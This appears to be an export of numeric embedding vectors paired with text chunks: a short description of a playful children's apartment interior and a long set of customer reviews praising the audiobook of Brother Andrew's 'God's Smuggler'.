0.028675930574536324, -0.030859341844916344, 0.03212147578597069, -0.006171832326799631, -0.024672210216522217, 0.07210560888051987, 0.05232379585504532, 0.10057385265827179, -0.013607028871774673, -0.027245210483670235, -0.00016990926815196872, -0.1405329704284668, 0.06798973679542542, 0.04499571770429611, 0.06334802508354187, -0.00707582850009203, 0.07152878493070602, -0.02177954651415348, 0.04164847731590271, 0.020547350868582726, -0.007925571873784065, 0.004276956897228956, -0.061721865087747574, -0.042254410684108734, 0.02229614369571209, -0.02020309306681156, 0.0860472247004509, -0.01752374693751335, 0.0006328579038381577, -0.12921838462352753, 0.04738038033246994, 0.06607931852340698, 0.034662000834941864, 0.08014731109142303, 0.06300356984138489, -0.0914883092045784, -0.04380584508180618, -0.08112505823373795, -0.006606608629226685, -0.02294447086751461, -0.0383734293282032, 0.017909159883856773, 0.012450890615582466, 0.036022648215293884, 0.001978790620341897, -0.0784299373626709, 0.04784896597266197, -0.03529250621795654, 0.07264450192451477, 0.00007870083209127188, 0.08231405168771744, 0.0151973282918334, -0.04565975069999695, 0.008124767802655697, -0.0037989788688719273, 0.05708795785903931, 0.029582571238279343, -0.03932160139083862, -0.05850841850042343, 2.6236763913994753e-33, -0.0011240285821259022, 0.011924191378057003, -0.0986451730132103, 0.031379446387290955, 0.04152457416057587, -0.043544113636016846, -0.030151022598147392, -0.0104443971067667, -0.0554475374519825, -0.08358629047870636, -0.04913102835416794, -0.013956092298030853, 0.07399297505617142, 0.01835617609322071, 0.07038911432027817, -0.07302092015743256, 0.034765806049108505, 0.02122100070118904, -0.005555146839469671, 0.026736484840512276, -0.01635478064417839, 0.015936139971017838, -0.048120442777872086, 0.015130799263715744, 0.010097412392497063, 0.01081146765500307, -0.02965543419122696, -0.07472707331180573, 0.05976298823952675, 0.018925992771983147, -0.09553558379411697, 0.06840474903583527, -0.016547266393899918, 0.08319906145334244, 0.0030902831349521875, 0.02559436485171318, -0.01990347169339657, -0.08135902881622314, -0.03434502333402634, -0.05459977313876152, -0.0670243501663208, 0.04597748816013336, -0.04487002640962601, -0.06609039008617401, 0.15622897446155548, 0.04843385890126228, 0.009399390779435635, -0.06042294576764107, 0.08588913828134537, -0.10751804709434509, 0.03906536474823952, 0.06685903668403625, -0.06320980191230774, -0.02267284132540226, 0.055684011429548264, -0.014382313005626202, -0.04497562348842621, 0.02018548548221588, 0.05045655369758606, 0.04576249420642853, 0.04141092300415039, 0.03892701491713524, -0.05792951211333275, -0.009024868719279766, -0.015298845246434212, 0.01711917668581009, -0.10077667981386185, 0.0471784770488739, 0.08307275921106339, -0.03414085507392883, -0.09926193207502365, -0.040669746696949005, -0.046858154237270355, 0.03215108811855316, 0.026488306000828743, 0.048010025173425674, -0.011169390752911568, -0.039485301822423935, -0.029267506673932076, -0.006947487127035856, -0.014007484540343285, 0.0012454134412109852, -0.004124124068766832, -0.00035478390054777265, 0.016700565814971924, -0.06435041129589081, 0.03552957996726036, 0.037258755415678024, -0.02595832571387291, 0.02293873392045498, -0.011550715193152428, -0.025969363749027252, 0.026584431529045105, 0.09054801613092422, -0.022387990728020668, -5.172052084053213e-33, -0.012309089303016663, -0.06941059231758118, -0.10734256356954575, -0.04428822919726372, -0.044397734105587006, -0.0013596662320196629, -0.050243888050317764, -0.017142662778496742, 0.009981010109186172, -0.0924973264336586, -0.02292698808014393, -0.06475881487131119, 0.036410558968782425, 0.10281956195831299, -0.03931114822626114, -0.08459186553955078, -0.06761231273412704, -0.00998260173946619, 0.016889214515686035, 0.13030210137367249, 0.07396271079778671, 0.012753592804074287, -0.03553725779056549, 0.03557464852929115, 0.016091184690594673, 0.07290708273649216, 0.006313399411737919, -0.028413744643330574, 0.01683112047612667, -0.019916057586669922, -0.058571066707372665, -0.013121187686920166, -0.07723919302225113, 0.01020566001534462, 0.05564892664551735, 0.0034761298447847366, -0.003140299115329981, 0.021493898704648018, -0.06454159319400787, 0.02008032612502575, 0.08638554066419601, 0.009054812602698803, -0.023386990651488304, 0.01344597153365612, 0.039099663496017456, 0.0030458923429250717, 0.032136570662260056, 0.054551951587200165, -0.0974460169672966, -0.017944753170013428, -0.05163383111357689, -0.039452582597732544, -0.00008531784260412678, -0.04353819042444229, 0.02690047398209572, 0.07986930012702942, 0.12076710164546967, -0.0899682566523552, 0.018202707171440125, 0.05336027219891548, -0.024868713691830635, 0.03763845935463905, 0.021335836499929428, -0.019726401194930077, 0.07593123614788055, -0.0804801806807518, 0.0008989634807221591, -0.03490614518523216, -0.005184999667108059, 0.01783621311187744, -0.00016780894657131284, 0.022318553179502487, -0.0726921334862709, -0.027476176619529724, 0.05168933421373367, -0.00041379741742275655, 0.07618707418441772, -0.005256379954516888, -0.00753440149128437, -0.03260347619652748, -0.04964176192879677, 0.09705139696598053, 0.01617676205933094, 0.10048320889472961, 0.05290025845170021, -0.0013725297758355737, -0.009593081660568714, -0.016608694568276405, 0.004197191447019577, 0.07469575852155685, -0.009068772196769714, -0.02544967643916607, 0.018330899998545647, 0.04421428218483925, -0.11737070232629776, -6.251963213799172e-8, 0.023085810244083405, 0.0595054030418396, -0.1142275333404541, 0.06096099689602852, 0.05125831440091133, -0.032404620200395584, -0.0660271868109703, -0.10532774776220322, -0.021363308653235435, 0.031133422628045082, 0.016349345445632935, 0.04814601689577103, -0.10509002208709717, -0.012460071593523026, -0.024717409163713455, -0.006014296319335699, -0.07731838524341583, -0.05788131430745125, -0.07772895693778992, -0.04639779031276703, -0.014973299577832222, 0.045109253376722336, 0.025586159899830818, 0.058616023510694504, -0.024241087958216667, -0.002746823476627469, 0.01725350320339203, 0.03183995187282562, 0.027154259383678436, -0.04623787850141525, -0.02019810676574707, 0.046914804726839066, -0.03323386609554291, 0.01882077194750309, 0.0045041549019515514, 0.05449230968952179, -0.0005949832266196609, 0.006281137000769377, 0.10842099040746689, -0.0022051562555134296, 0.08568259328603745, -0.07971459627151489, 0.017581088468432426, 0.019512083381414413, 0.09153509885072708, -0.003656441578641534, -0.009314908646047115, -0.05984698608517647, 0.04314611107110977, -0.00026124255964532495, -0.0945112407207489, -0.01767796464264393, 0.02435002103447914, 0.13561168313026428, 0.07761853188276291, 0.056015901267528534, -0.05735614895820618, -0.09042064100503922, 0.05844871699810028, -0.006051942706108093, 0.059466652572155, -0.015168322250247002, -0.02777613326907158, 0.05837367847561836 ]
The use of matte finishes on structural surfaces and objects makes the whole space feel soft and welcoming, despite the cold colours and in contrast to the vast sea of grey skyscrapers that stretches beyond the windows. As a way to excite the children’s curiosity and help them cultivate their creativity, special features have been added all around the house, including little niches that serve as hide-outs, a Lego-brick “painting” in the lobby which can be dismantled and recreated in limitless combinations, and of course a blackboard wall for drawing. In the children’s room, the closets were given a playful configuration to further excite the young ones' imagination, designed in such a way so that it can be adapted later on to suit the children's taste as they grow older.
[ 0.00767497206106782, 0.09899788349866867, 0.05964844673871994, 0.00816726591438055, 0.04692809656262398, 0.04146336391568184, 0.028106873854994774, -0.007070622872561216, 0.03339513763785362, 0.008655320852994919, 0.009224416688084602, 0.014053993858397007, 0.028434056788682938, 0.03190096840262413, 0.030468285083770752, -0.0163264200091362, 0.04054291546344757, -0.018175791949033737, -0.007591752335429192, -0.03703579306602478, -0.0034213836770504713, -0.06787599623203278, -0.013867387548089027, -0.04409649223089218, 0.000676299910992384, 0.08941762149333954, -0.005616123788058758, -0.04832109808921814, 0.05143120512366295, -0.04318126663565636, 0.059451017528772354, 0.022475147619843483, 0.0559900626540184, -0.0341486930847168, 0.058114390820264816, 0.029975824058055878, 0.042792484164237976, 0.04819965735077858, -0.06377676129341125, -0.05388695001602173, -0.03336046636104584, -0.0038321991451084614, -0.025965329259634018, -0.0016698692925274372, -0.040492113679647446, -0.06304971873760223, 0.04103241488337517, -0.13032490015029907, 0.02311740256845951, -0.0316779688000679, -0.025921955704689026, -0.02160062827169895, -0.06195211410522461, -0.028123890981078148, 0.007541152182966471, 0.01063322089612484, 0.06105758249759674, -0.059710800647735596, 0.06881219148635864, -0.07608753442764282, 0.01576290838420391, 0.017430970445275307, -0.012706219218671322, 0.01409805379807949, 0.04854646697640419, -0.07245700806379318, -0.06285066157579422, 0.06529520452022552, 0.03165539726614952, 0.0025082693900913, 0.02978852018713951, 0.021732298657298088, 0.0936247855424881, 0.01565077155828476, 0.0597166083753109, 0.023294977843761444, -0.07843710482120514, -0.08322840183973312, -0.0008135485113598406, -0.05584586039185524, -0.00307262665592134, -0.04042453318834305, -0.05318097397685051, 0.02858523093163967, -0.062087539583444595, 0.04422060772776604, 0.02008739672601223, -0.013214534148573875, -0.04785681515932083, -0.004940093029290438, -0.06580148637294769, -0.003063335781916976, -0.0578714981675148, 0.04452454671263695, -0.0002559054992161691, -0.09143246710300446, -0.030844027176499367, -0.04195331782102585, -0.05410942807793617, -0.0010566003620624542, 0.01450236514210701, 0.018009869381785393, 0.15280906856060028, 0.007920715026557446, -0.006510869134217501, -0.10827057808637619, -0.036758508533239365, -0.0009474976686760783, -0.0071433717384934425, -0.011425117962062359, -0.08335838466882706, -0.06854372471570969, 0.007883165031671524, 0.03929602727293968, -0.06372427940368652, -0.07500063627958298, 0.08141528069972992, -0.039493367075920105, 0.009132671169936657, 0.03495468199253082, 0.16369393467903137, 0.04573393240571022, 0.03219326585531235, -0.003117822576314211, -0.07111667096614838, -0.09410035610198975, -0.07093054056167603, -1.5050417125169195e-33, 0.030469268560409546, 0.007638175506144762, -0.043729860335588455, 0.09394073486328125, 0.1570919156074524, -0.020311875268816948, 0.05374186113476753, -0.008242818526923656, -0.02038697525858879, 0.05243183299899101, 0.08589485287666321, -0.029093828052282333, -0.04320462420582771, 0.1173912063241005, 0.03683729097247124, -0.003181914333254099, -0.08843860030174255, -0.03868327662348747, -0.0008423728868365288, 0.050963882356882095, -0.0643344521522522, 0.053932685405015945, 0.014524945057928562, 0.029882322996854782, -0.009776603430509567, 0.020758148282766342, 0.0030272977892309427, 0.0056373649276793, -0.05523521825671196, -0.0003442926681600511, -0.03683291748166084, 0.07822323590517044, -0.08270207047462463, -0.016760477796196938, -0.05082477256655693, 0.014423975721001625, 0.050031326711177826, -0.06263335049152374, 0.035611897706985474, 0.028631791472434998, -0.026511598378419876, -0.07157663255929947, -0.024071961641311646, 0.04253871738910675, 0.06228914484381676, 0.053838152438402176, 0.05412117391824722, 0.03411303833127022, -0.0430053286254406, 0.10499358922243118, 0.06471631675958633, 0.04466906934976578, -0.057840801775455475, -0.05096379667520523, -0.015832627192139626, -0.07727798819541931, 0.03229481354355812, -0.07000792771577835, 0.012325363233685493, -0.0899173691868782, 0.04597670957446098, 0.02929970622062683, -0.015119440853595734, 0.007112497463822365, -0.04338906705379486, 0.04546615108847618, 0.06461204588413239, 0.018744301050901413, -0.011419424787163734, -0.006893541663885117, -0.08978110551834106, -0.0067352536134421825, 0.008408021181821823, -0.0658915638923645, -0.061114415526390076, -0.0591844767332077, -0.03421451523900032, -0.0403866246342659, 0.03422228619456291, -0.02192298136651516, 0.03778759390115738, 0.06056077778339386, -0.04279690608382225, -0.03466172143816948, -0.0754629597067833, -0.07261411100625992, 0.050817880779504776, -0.008574506267905235, -0.08482947945594788, -0.021071990951895714, -0.0041537415236234665, -0.08927496522665024, 0.010876747779548168, -0.018520068377256393, -0.05686691030859947, -1.6925070720276617e-33, 0.030471941456198692, -0.06752268970012665, -0.041392918676137924, -0.0123452702537179, 0.026377517729997635, -0.018813548609614372, -0.04387925937771797, -0.025609977543354034, 0.03431002423167229, 0.047632619738578796, -0.026177674531936646, 0.06781002134084702, 0.051943179219961166, -0.018755091354250908, 0.035202909260988235, -0.026025114580988884, 0.08540895581245422, 0.0693105086684227, -0.02424691617488861, -0.05480233579874039, 0.07760366052389145, 0.03239141032099724, -0.09070434421300888, 0.02001834847033024, 0.015265360474586487, 0.04759545996785164, -0.016739625483751297, -0.03341814875602722, -0.006694161798804998, 0.010805007070302963, -0.0216508861631155, -0.08296293020248413, 0.036565832793712616, 0.05571983382105827, 0.03189725801348686, -0.04635186865925789, -0.04854176566004753, 0.04453633353114128, -0.08829327672719955, -0.09325242042541504, -0.015405600890517235, -0.05902886763215065, 0.01563873328268528, 0.11817359924316406, -0.03361719474196434, 0.036647845059633255, -0.04399183765053749, 0.034541621804237366, -0.03897300735116005, 0.0306237880140543, 0.04742547497153282, 0.023786181584000587, -0.031373608857393265, -0.1616550087928772, -0.035783786326646805, 0.02442379854619503, 0.004974768031388521, 0.03469715639948845, 0.10210248827934265, 0.15372547507286072, 0.07559520751237869, 0.01405586302280426, -0.06548458337783813, -0.032894317060709, -0.07508740574121475, -0.023069988936185837, -0.1113143339753151, 0.022286025807261467, -0.05189106613397598, 0.055245380848646164, 0.051471833139657974, 0.08115624636411667, -0.018156319856643677, -0.03460371121764183, 0.00034571209107525647, 0.008714905008673668, 0.06561531871557236, 0.013263487257063389, -0.030603814870119095, 0.009150057099759579, -0.054702483117580414, -0.027129853144288063, -0.0027565411292016506, -0.0027508435305207968, 0.024585606530308723, 0.007690864149481058, -0.09035614877939224, 0.04782230779528618, -0.014426755718886852, -0.0331876166164875, 0.07259462028741837, 0.09424962848424911, -0.01507073175162077, 0.008190307766199112, 0.025374628603458405, -5.041524531179675e-8, -0.018712293356657028, -0.0007787298527546227, 0.0028545886743813753, -0.0882313922047615, -0.01556155551224947, -0.02979275956749916, 0.07596790790557861, 0.033475153148174286, 0.038837775588035583, 0.011330144479870796, 0.06287561357021332, -0.04278312996029854, -0.007587836589664221, 0.09419524669647217, 0.051094021648168564, 0.061626236885786057, -0.028284568339586258, -0.008023170754313469, -0.017617471516132355, 0.027561327442526817, -0.00006620659405598417, 0.03605565428733826, -0.011114384047687054, -0.005690630059689283, -0.1095462515950203, -0.023939602077007294, -0.0382404588162899, -0.021438034251332283, -0.01600504294037819, 0.0945415273308754, 0.021395590156316757, 0.0050431001000106335, 0.01909475028514862, 0.028585653752088547, -0.005820343736559153, -0.03519616276025772, -0.00006342428241623566, 0.009028599597513676, -0.0744776576757431, -0.0034032869152724743, 0.04972025379538536, -0.09834238886833191, 0.007719186134636402, 0.011955714784562588, -0.034388601779937744, -0.0162487905472517, 0.019212733954191208, 0.0023316373117268085, -0.05618096515536308, 0.08749444037675858, -0.05973365902900696, -0.011335192248225212, -0.04416481778025627, -0.030730195343494415, 0.06891699135303497, -0.023177312687039375, -0.031242070719599724, 0.07710956037044525, 0.030753593891859055, 0.05761631578207016, 0.024701183661818504, 0.05090416222810745, -0.041600845754146576, 0.11306866258382797 ]
Customer Reviews The well-written, well-read, and inspiring true-life story of Brother Andrew. Overall A classic book well read. Overall Living by faith...that's all. Overall Awesome book of how God led brave men and woman behind the "iron curtain" to do His will Overall I enjoyed this biography very much. The narrator was excellent and had been engaged the entire time. Brother Andrew's story is one of faithfulness. His faithfulness to what God had called him to do and God's faithfulness to provide for him all along the way. Your faith will be encouraged after listening to this! Overall I didn't want it to end. Wow. What a great testimony of the work God does through his children. This man's obedience and faith is something I strive for. Overall A great example of Revelation 22:17 "and all who hear say come." Overall Excellent and exciting story to listen to. This story inspired me to share the gospel more. Overall The voice of the narrator is very good, and the story was already excellent. We have listened to this over and over with my teenagers and even younger kids. Overall Great reminder of God's faithfulness to His promises. Matthew 6:33-34 "But seek ye first the kingdom of God, and his righteousness; and all these things shall be added unto you. Take therefore no thought for the morrow: for the morrow shall take thought for the things of itself. Sufficient unto the day is the evil thereof." The LORD's ways work! This is something the current day "church" at large has forgotten. Overall Very encouraging and challenging! Overall Wonderful book and challenging! A must read for any Christian. Overall Renews faith in God who answers prayer. Overall Exceptional Overall I cannot believe that I was not required to read this in an undergraduate or graduate level Bible course. It was captivating and motivating. I was skeptical before I purchased it. I had heard a bit about it, but now I am going to make sure my sons who are going into ministry listen to it Overall Loved this book! Overall Well written, believable, applicable, and powerful. Few dry spots. Overall Thanks to those who put this together so that I could benefit from the work God is doing through the faithful. It truely was a great book to listen to! Overall This is an excellent recording of a well written book chronicling the story God has written in the life of Brother Andrew. Andrew's inability and God's ability are shown over and over in the stories of taking love, encouragement, and Bibles to places where they were not allowed. The ending challenge to look toward those behind the "curtain" of Islam is convicting. Overall Brother Andrew talks about his stories of smuggling Bibles into Communist nations in the 50s and 60s. It is a story of dares, adventures, and most of all, God's miraculous providence as he would minister behind the Iron Curtain. As he would cross the borders in his car, guards would either miraculously ignore his car that was loaded with Bibles, or sometimes they would stare at the Bibles right in front of them and then inexplicably let him pass. That's just a teaser, read the book if possible. Overall Great audio presentation of this book, love it! Overall These old stories are so good. encouraging! Overall AMAZING GRACE!!!!!!! Overall Compelling and exhorting story. Well read. A must "listen to." Overall This audiobook was excellent! Several times it had me laughing out loud at both God's and Brother Andrew's audacity! I especially enjoyed the epilogue, which I hadn't read before (I first read the book about ten years ago). Overall Our family has absolutely LOVED this audio book. The reading is clear and pleasant to listen to, as well as a well written, true and captivating story. God's testimony really of GOD WORKING through His Holy Spirit in encouraging those in His family isolated from the rest of the world by their governments. Nothing can stop God, He is faithful and all of our faith is strengthened in listening to this beautiful story. Highly recommended for almost all ages, my 7 yr old even got something out , when he listened :-) Overall I loved listening, It teaches alot about having faith in god for every day things. Overall I read this book the first time at about age 13, which was in 1968! I remember how it impacted my faith. I decided to listen to it recently, and am so glad I did! I hope many receive the faith boost that I did! Overall This book has been an inspiration, encouragement and it challenged us with the power of prayer, trust & sacrifice. Overall I remember reading this book when I was in third grade, and it was a God-themed spy thriller to me. Now, as I listen to it again, I see it in such a larger, richer context. What a wonderful, beautiful example Brother Andrew is to me and to us. I thank God for him and the inspiration this book gives me for my life today. Overall Enjoyed, great book. Overall This book is an absolute must read for all Christians. As a family, we love this audiobook. Brother Andrew is a modern-day hero of the faith, and his stories are so amazing and compelling. It inspires your faith to realize that God uses real people in such extraordinary ways. I have had the blessing of hearing Brother Andrew speak in person and he is truly an amazing man of God. Do yourself a favor and buy this audiobook! Overall This was written several years ago, but is still a great testimony of God's grace and this brother & his wife's faithfulness. It is inspiring even after reading this so many years ago and having served on the mission field. Brother Andrew and his team were true pioneers and people of faith. This is well worth a listen or read! Overall The most encouraging,uplifting and challenging biography l have heard to date. The dramatization is captivating. Overall The first book I've read about Brother Andrew was "God's Call', which as the book jokingly describes as God's Smuggler 2. I enjoyed that book so when I saw this on christianaudio, I immediately grabbed it. I just finished listening to it and I'm blown away by Brother Andrew's story. Somehow I could relate to him having being a God-hating atheist to a Christian. It's amazing how God works in people's lives. The narrator for this audiobook is amazing. It's easy to fall into the story with how he narrates it. This is an amazing book and how the audiobook is read is perfect. I'm sure I'll be listening to this again and again. And buy the Kindle version. :) Overall Hott Synopsis Defiant. Belligerent. Reckless. All of those words describe Andrew. From the time he was a child he pushed the lines. He did exactly what he knew he shouldn’t. Did Christ change him? Not really. He pushed the lines for the rest of his life – but he did it God’s way. Don’t miss this – it’s life changing! Hott Review I’m not big on audiobooks. Audio-dramas I love but no so much audiobooks. Yet, from the time the first words were spoken I was enthralled. I listened to this several times before I felt like I was finished. There was so very much. Not only was it an absolutely awesome story but there was so much to learn and feel it’s almost indescribable. More… Author: Brother Andrew, John Sherrill, Elizabeth Sherrill, Simon Vance (Narrator) Source: I purchased this audiobook for my hubby and after listening to less than 10 minutes of it needed it for myself, as well. Luckily, it was ChristianAudio.com’s Free Audio for February 2013 & I didn’t need to buy another copy! Grade: A+ Ages: There are some scenes that may not be appropriate for all ages. Overall This is an incredible story of great faith and awesome grace... if only I had the strength of Brother Andrew! Overall Short Review: this is a classic 20th century missionary story. I first read the comic version of the book in the late 1970s as a child. I am not sure if I have read the full thing before or not. This is worth reading but I read it in tension with The God of the Mundane because I also agree with the concept of that book that most of our lives as Christians deal with the day to day and not the miraculous. The difficulty is holding up not normal examples of Christian faith like this, while trying to value the every day faith of the majority of Christians that will be never known. I did appreciate the focus of this book on trying to serve Christians in more difficult situations than what most of us in the West have to deal with. This review also appears at http://bookwi.se/gods-smuggler/ Overall What a great example of the power of Jesus Christ to transform life! This is a captivating story, well written and well narrated. Overall Loved to hear about God's faithfulness in Brother Andrew's life! Overall Very well done. I was fascinated by the story and didn't want to take breaks from listening! I recommend this book, especially to those seeking to trust God more. Overall I thoroughly enjoyed this book. It is a fascinating and compelling story from beginning to end, and I highly recommend it. The devotion and tenacity of purpose displayed by "God's smuggler" are amazing and inspiring. Overall A very moving account of an extraordinary life well lived. Overall So good, so inspiring! Time just flies by whilst listening to this book! Overall read it years ago, what faith this man had in God, how he was provided for is such an inspiration Overall This book is really uplifting! I read it years ago, but my family & I enjoyed listening to it and being reminded of God's mercy & faithfulness & provision. Overall I thoroughly enjoyed this biography and would recommend it. The only issue I had was, toward the end (Epilogue) where Brother Andrew's activities among the Orthodox and Catholics was highlighted. I disagree that Protestants and Catholics can work together in the work of the gospel as they come from fundamentally different views as to the path that leads to salvation. But in all other respects - fascinating and insightful (especially as my family and I are missionaries). Overall Great book. Enjoyed the updates at the end. Overall This book is wonderful. An amazing story of God's grace calling a sinner unto Himself. It is an inspiring story! Overall This book is very interesting and inspiring. Overall I loved God's Smuggler and was inspired by the way God protected and enabled this man to serve the Body of Christ in Bible deprived areas of the world. Overall Inspiring true story of God at work in every day people, who are amazing behind the iron curtain in the 1950's and a1960's Overall Amazing testimony. Easy writing style & a very good reader. Overall Very good. Entertaining and informative. Overall WOW! - Can't say much more than that. This book really demonstrates what God can do for those who are faithful. Overall This book had me hooked from the beginning. It was amazing how God "closed" the eyes of so many to protect people in this ministry. Brother Andrew believed God for big things & God showed Himself in awesome ways. Overall A must read for every Christian. Overall What a great story of God's word going forth. It made me really search my own heart and challenged my faith. Overall Brother Andrew's story reads like a story that belongs in the Bible. He was the most unlikely person to become a Christian but God in His mercy never abandoned him. As radical as he was as a sinner he was just as radical and passionate as a saint. His story inspires us to obey God's voice, believe God for miracles, to have passion for the lost, and encouragement for the saints. I cannot begin to tell you how much my whole family loves this book. We're going through it again with the help of this audiobook. Overall Real faith Real service Real people Real christianity Real God Overall The church I belong to in Dusseldorf - (Christ Church Anglican.de) supports the work of Open Doors International, this link in mission prompted me to listen to (and recommend) Brother Andrew's story - God's Smuggler. I had known something of Brother Andrew and his work behind the Iron Curtain, but no real details. I love this book for the way his story is told giving depth to why we should support the work of Open Doors International. Thank you. Overall Great story of a man who has been transformed by God and how God uses an ordinary man to do great work in His ministry. Giving all of us hope. Overall A great example of listening to God and doing what He wants, no matter what the risk nor the cost. Overall I could not stop listening to this book! The reader was pleasant to listen to and easy to understand. The story could bring you to tears or great joy. I felt like I was part of the story and found myself thanking God for people like this! Thank you for placing this book on the Free monthly download. My God bless you. Overall This is an awesome story of God's unfailing provision. I've not completed it yet and already I've been praying for the faith of Brother Andrew! This book will inspire and encourage you to trust God and know that He is faithful. Overall Thanks to christianaudio, I had the chance to listen to this audiobook for free. Though I enjoyed the fiction audiobooks which were distributed with no charge, it was a great pleasure to hear a REAL story, REAL acts of God. I constantly gasped when brother Andrew was in trouble, and was astonished how God worked in a 'King's way'. I think this book shows a good example of how someone could walk in step with the Spirit :) Overall God's Smuggler by Brother Andrew and John & Elizabeth Sherrill was narrated by Simon Vance who did an excellent job of reading the book. As a young boy, Brother Andrew had daydreams of becoming a spy and working undercover behind enemy lines. When he grew up and became a Christian, he became an undercover agent for God by delivering Bibles to Communist countries. Brother Andrew found himself in many situations where he seriously wondered if he would end up in prison or worse, but every time God came through in a miraculous way. There were several times when his car was searched from bumper to bumper yet the guards did not seem to notice the Bibles in plain view on the seat beside Brother Andrew. At one time he was talking with a Russian guard and commented that the Russians seemed to know all about him. The guard told him that God's Smuggler was required reading for the Russian police. I learned so much listening to this book and one of the things that really stuck in my mind was the fact that in Bulgaria there are churches that do not have even one Bible. At least this was true when the book was written in the sixties. Brother Andrew was so successful because he trusted God, prayed to God for help, and believed that God was with him and would answer his prayer. I would recommend this book to every Christian, possibly even consider it required reading. Even non-Christians might enjoy reading the book. I received this audiobook free from christianaudio's Reviewers Program in exchange for posting a review. Overall What an inspiring and challenging story. After listening to this book I am re-motivated to draw close to God so that I will know where and how He wants me to serve. I highly recommend it. Overall "Page turner," "Couldn't put it down," "Exciting," "Well worth the money," "100% satisfaction guaranteed" etc. etc. This book lives up to all those cliches! It was absolutely fantastic and my family didn't want it to end. From the story itself to the narrator it was wonderful. We listened to this on our vacation as we were traveling. It even kept our 8 year old's attention! This book was faith building! God' use me like "Andy":)) Overall I thoroughly enjoyed listening to the God’s Smuggler Audio book, written by Brother Andrew and John and Elizabeth Sherrill. It’s the kind of book you can’t put down, or stop listening to if you have the audio version. This is a true story about a young Dutch man named, Andrew who enlists in the military and finds it is not the adventure he originally thought it would be. He spent endless hours drinking, partying, and living with the guilt of killing people in war. God saved him and he began a real adventure of smuggling bibles into communist countries. I was inspired by Andrew’s life and mission to spread God’s word in some of the most difficult and dangerous places. I was awed by how many times he was able to get across the border with a van full of bibles, undetected. There were even times that his car was searched from trunk, to motor, to glove compartment, and officers did not see the bibles that were in plain sight. This was truly a testimony of God’s miraculous power and ability to do above what we ask for or think. I learned that my faith needs to be stronger. Andrew defied odds so many times because he trusted God, prayed and believed that God was with him. He was able to get into China when everyone told him it was impossible. Nothing is impossible with God! Andrew's heart for evangelism is truly inspirational and made me examine my own commitment to sharing the gospel. I was also convicted by Andrew’s self sacrifice. He and his wife were willing to sell their house so that they would have enough money to print bibles. I won’t tell you what happened, but God blessed their willingness to give up everything. The narrator of this audio book did a good job. At first I found it difficult to understand his English accent, but once I adjusted I thought he did a wonderful job. I recommend this book to everyone. This is a review for christianaudio. I was not required to give a good review. You can find more audio books on Christianaudio.com Overall
[ -0.013642474077641964, 0.048829641193151474, 0.02700386755168438, 0.011456310749053955, -0.02901686541736126, 0.01871654763817787, -0.044994279742240906, -0.04716780036687851, 0.06024913489818573, -0.05055829510092735, -0.031685054302215576, 0.14291393756866455, 0.06667360663414001, -0.009282530285418034, 0.022292934358119965, 0.02031540498137474, -0.020011931657791138, 0.008507024496793747, -0.026125909760594368, -0.0826445072889328, -0.03504589945077896, 0.07669250667095184, 0.06961984187364578, 0.02834324724972248, -0.03560274839401245, 0.04782406985759735, -0.043246082961559296, -0.03936537355184555, -0.04983469471335411, -0.03993288427591324, -0.011165876872837543, -0.053838349878787994, 0.023215528577566147, -0.07269860059022903, -0.05037468299269676, 0.04468082636594772, 0.015444737859070301, 0.03493451327085495, 0.028150616213679314, -0.03855191171169281, 0.02687867544591427, 0.011778631247580051, 0.030651120468974113, -0.03691967576742172, 0.016381727531552315, -0.10814696550369263, -0.09097487479448318, -0.06291525065898895, 0.052053872495889664, 0.029350614175200462, -0.09544212371110916, -0.05161457508802414, 0.08483605831861496, -0.06686318665742874, -0.0793459564447403, 0.14195476472377777, -0.04540340602397919, -0.0475895069539547, -0.02357860840857029, -0.04353206604719162, -0.00663794158026576, 0.011995864100754261, -0.05303303152322769, 0.01747320592403412, -0.04782690480351448, 0.006228208541870117, 0.004932137206196785, -0.012283132411539555, -0.0010500652715563774, 0.02598259598016739, -0.019258074462413788, 0.017582008615136147, 0.10586331784725189, -0.03238923102617264, -0.07355517148971558, -0.00005854895425727591, 0.04342533275485039, -0.08775307238101959, -0.00015175669977907091, -0.055896759033203125, -0.027818677946925163, -0.019885055720806122, -0.025152282789349556, -0.01791544072329998, -0.09069720655679703, -0.04730641469359398, 0.10674022138118744, -0.12473944574594498, -0.004913815297186375, 0.07303769886493683, -0.022642089053988457, 0.04260671138763428, 0.05402336269617081, 0.009913080371916294, 0.01933145336806774, 0.07187128812074661, -0.002948402427136898, -0.00993172824382782, -0.12025241553783417, 0.02054249309003353, 0.015264392830431461, 0.04087182879447937, 0.004490900784730911, -0.05214665085077286, 0.005532695446163416, -0.044523462653160095, -0.10537814348936081, -0.006309809163212776, -0.03669579327106476, 0.022885600104928017, 0.06397998332977295, -0.007947368547320366, -0.02263517491519451, 0.009964908473193645, 0.05888580158352852, 0.033910494297742844, 0.028765710070729256, 0.01666577346622944, -0.02347004972398281, 0.0822887197136879, 0.05338088795542717, 0.11427048593759537, 0.026365386322140694, 0.09358864277601242, 0.05309240147471428, -0.07053355127573013, 0.13241805136203766, 3.2908485976888116e-33, 0.018913276493549347, 0.056918300688266754, 0.0010667205788195133, 0.12316400557756424, 0.025482486933469772, 0.012329880148172379, -0.04129047319293022, -0.0011899005621671677, -0.12419914454221725, -0.039378318935632706, -0.018780868500471115, 0.046317484229803085, -0.012906509451568127, -0.0018770195310935378, -0.11792459338903427, -0.02664182521402836, -0.06819701194763184, -0.02160448208451271, 0.08125656843185425, 0.06208961084485054, 0.021861476823687553, 0.005197048187255859, -0.012466511689126492, -0.013332323171198368, 0.021345725283026695, -0.014566397294402122, 0.06273164600133896, 0.09223461896181107, -0.02435516193509102, 0.045111510902643204, -0.09039866179227829, 0.022912709042429924, 0.03522000089287758, -0.03174133598804474, -0.018043886870145798, -0.03605039790272713, -0.024449044838547707, -0.016301529482007027, 0.032786861062049866, -0.025716258212924004, -0.0688830316066742, 0.02295251004397869, -0.006635912694036961, 0.0022149786818772554, 0.0019446590449661016, -0.017997900024056435, 0.045974958688020706, -0.03164972737431526, -0.0020874859765172005, 0.06608063727617264, -0.060563892126083374, -0.02266673371195793, 0.007742851506918669, -0.01965559646487236, -0.027572568506002426, 0.01728970743715763, -0.046563439071178436, 0.06001542508602142, 0.04453705623745918, -0.00604527210816741, 0.10322646796703339, -0.0032550061587244272, 0.021072298288345337, -0.013354293070733547, -0.02962503768503666, 0.0018857597606256604, -0.01650438830256462, -0.015937378630042076, -0.024111496284604073, -0.01373083796352148, -0.06809341907501221, 0.03830676153302193, 0.008292867802083492, -0.018111754208803177, 0.0016909108962863684, -0.00887190829962492, -0.08534347265958786, -0.003986380994319916, 0.04308468848466873, -0.03612179681658745, 0.08325126022100449, 0.054347556084394455, 